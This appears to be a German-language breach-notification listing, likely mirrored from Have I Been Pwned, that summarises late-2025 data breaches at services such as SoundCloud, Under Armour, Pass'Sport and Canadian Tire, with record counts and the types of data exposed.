| Ages, Astrological signs, Bios, Device information, Education levels, Email addresses, Family structure, Forum posts, Genders, Geographic locations, Income levels, IP addresses, IQ levels, Nicknames, Passwords, Physical attributes, Private messages, Profile photos, Races, Relationship statuses, Sexual orientations, Usernames In December 2025, the dating website "for a Europid vision" WhiteDate suffered a data breach that was subsequently leaked online, initially exposing 6.1k unique email addresses. The leaked data included extensive personal information such as physical appearance, income, education and IQ. A more comprehensive dataset was later provided to HIBP, containing usernames, IP addresses, private messages, phpBB password hashes and a total of 20k unique email addresses. |
||
| 17.12.2025 - Pass'Sport | 6.366.133 Datensätze geleaked | |
| Email addresses, Genders, Names, Phone numbers, Physical addresses In December 2025, data from France's Pass'Sport program was posted to a popular hacking forum. Initially misattributed to CAF (the French family allowance fund), the data contained 6.5M unique email addresses affecting 3.5M households. The data also included names, phone numbers, genders and physical addresses. The Ministry of Sports subsequently released a statement acknowledging the incident. |
||
| 16.12.2025 - APOIA.se | 450.764 Datensätze geleaked | |
| Email addresses, Names, Physical addresses In December 2025, a database of the Brazilian crowdfunding platform APOIA.se was posted to an online forum. In January 2026, the company confirmed it had suffered a data breach. The incident exposed 451k unique email addresses along with names and physical addresses. |
||
| 15.12.2025 - Raaga | 10.225.145 Datensätze geleaked | |
| Ages, Dates of birth, Email addresses, Genders, Geographic locations, Names, Passwords In December 2025, data allegedly breached from the Indian streaming music service "Raaga" was posted for sale to a popular hacking forum. The data contained 10M unique email addresses along with names, genders, ages (in some cases, full date of birth), postcodes and passwords stored as unsalted MD5 hashes. |
||
| 15.12.2025 - SoundCloud | 29.815.722 Datensätze geleaked | |
| Avatars, Email addresses, Geographic locations, Names, Profile statistics, Usernames In December 2025, SoundCloud announced it had discovered unauthorised activity on its platform. The incident allowed an attacker to map publicly available SoundCloud profile data to email addresses for approximately 20% of its users. The impacted data included 30M unique email addresses, names, usernames, avatars, follower and following counts and, in some cases, the user’s country. The attackers later attempted to extort SoundCloud before publicly releasing the data the following month. |
||
| 17.11.2025 - Under Armour | 72.742.892 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Geographic locations, Names, Purchases In November 2025, the Everest ransomware group claimed Under Armour as a victim and attempted to extort a ransom, alleging they had obtained access to 343GB of data. In January 2026, customer data from the incident was published publicly on a popular hacking forum, including 72M email addresses. Many records also contained additional personal information such as names, dates of birth, genders, geographic locations and purchase information. |
||
| 15.11.2025 - CodeStepByStep | 103.077 Datensätze geleaked | |
| Email addresses, Names, Usernames In November 2025, the online coding practice tool CodeStepByStep suffered a data breach that exposed 17k records which were subsequently published online. The following month, a further corpus of data was released bringing the total to 103k. The impacted data included names, usernames and email addresses. |
||
| 13.11.2025 - Eurofiber | 10.003 Datensätze geleaked | |
| Email addresses, Names, Phone numbers In November 2025, Eurofiber France disclosed a data breach of its ticket management platform. Data containing 10k unique email addresses and a smaller number of names and phone numbers was subsequently leaked. A threat actor claiming responsibility for the breach alleges to have additional, more sensitive data including screenshots, VPN configuration files, credentials, source code, certificates, archives, and SQL backup files. |
||
| 13.11.2025 - Operation Endgame 3.0 | 2.046.030 Datensätze geleaked | |
| Email addresses, Passwords Between 10 and 13 November 2025, the latest phase of Operation Endgame was coordinated from Europol's headquarters in The Hague. The actions targeted one of the biggest infostealer Rhadamanthys, the Remote Access Trojan VenomRAT, and the botnet Elysium, all of which played a key role in international cybercrime. Authorities took down these three large cybercrime enablers and provided 2 million impacted email addresses and 7.4 million passwords to HIBP. |
||
| 11.11.2025 - International Kiteboarding Organization | 340.349 Datensätze geleaked | |
| Email addresses, Geographic locations, Names, Usernames In November 2025, the International Kiteboarding Organization suffered a data breach that exposed 340k user records. The data was subsequently listed for sale on a hacking forum and included email addresses, names, usernames and in many cases, the user's city and country. |
||
| 09.11.2025 - Beckett Collectibles | 1.041.238 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Usernames In November 2025, Beckett Collectibles experienced a data breach accompanied by website content defacement. The stolen data was later advertised for sale on a prominent hacking forum, with portions subsequently released publicly. The publicly circulating data initially included more than 500k email addresses reportedly belonging to North American customers, before a larger corpus of over 1M addresses was published the following month. The impacted data included names, usernames, phone numbers and physical addresses. |
||
| 06.11.2025 - Zilvia.net | 287.863 Datensätze geleaked | |
| Email addresses, IP addresses, Passwords, Usernames In November 2025, data breached from the Zilvia.net Nissan 240SX Silvia and Z Fairlady car forum was leaked. The breach exposed 288k unique email addresses along with usernames, IP addresses and salted MD5 password hashes sourced from the vBulletin based platform. Attempts to contact Zilvia.net about the incident were unsuccessful. |
||
| 30.10.2025 - University of Pennsylvania | 623.750 Datensätze geleaked | |
| Charitable donations, Dates of birth, Email addresses, Genders, Income levels, Job titles, Names, Physical addresses, Religions, Salutations, Spouses names In October 2025, the University of Pennsylvania was the victim of a data breach followed by a ransom demand, largely affecting its donor database. After the incident, the attackers sent inflammatory emails to some victims. The data was later published online in February 2026 and included 624k unique email addresses alongside names and physical addresses. For some donor records, additional personal information was exposed, including gender and date of birth. A small subset of records also contained religion, spouse name, estimated income and donation history. |
||
| 24.10.2025 - MyVidster (2025) | 3.864.364 Datensätze geleaked | |
| Email addresses, Profile photos, Usernames In October 2025, the data of almost 4M MyVidster users was posted to a public hacking forum. Separate to the 2015 breach, this incident exposed usernames, email addresses and in a small number of cases, profile photos. |
||
| 23.10.2025 - Substack | 663.121 Datensätze geleaked | |
| Email addresses, Phone numbers In October 2025, the publishing platform Substack suffered a data breach that was subsequently circulated more widely in February 2026. The breach exposed 663k account holder records containing email addresses along with publicly visible profile information from Substack accounts, such as publication names and bios. A subset of records also included phone numbers. |
||
| 06.10.2025 - TISZA Világ | 198.520 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Usernames In late October 2025, data breached from the Hungarian political party TISZA was published online before being extensively redistributed. Stemming from a compromise of the TISZA Világ service earlier in the month, the breach exposed 200k records of personal data including email addresses along with names, phone numbers and physical addresses. |
||
| 02.10.2025 - Canadian Tire | 38.306.562 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Names, Partial credit card data, Passwords, Phone numbers, Physical addresses In October 2025, retailer Canadian Tire was the victim of a data breach that exposed almost 42M records. The data contained 38M unique email addresses along with names, phone numbers and physical addresses. Passwords were stored as PBKDF2 hashes and for a subset of records, dates of birth and partial credit card data were also included (card type, expiry and masked card number). In its disclosure notice, Canadian Tire advised that the incident did not impact bank account information or loyalty program data. |
||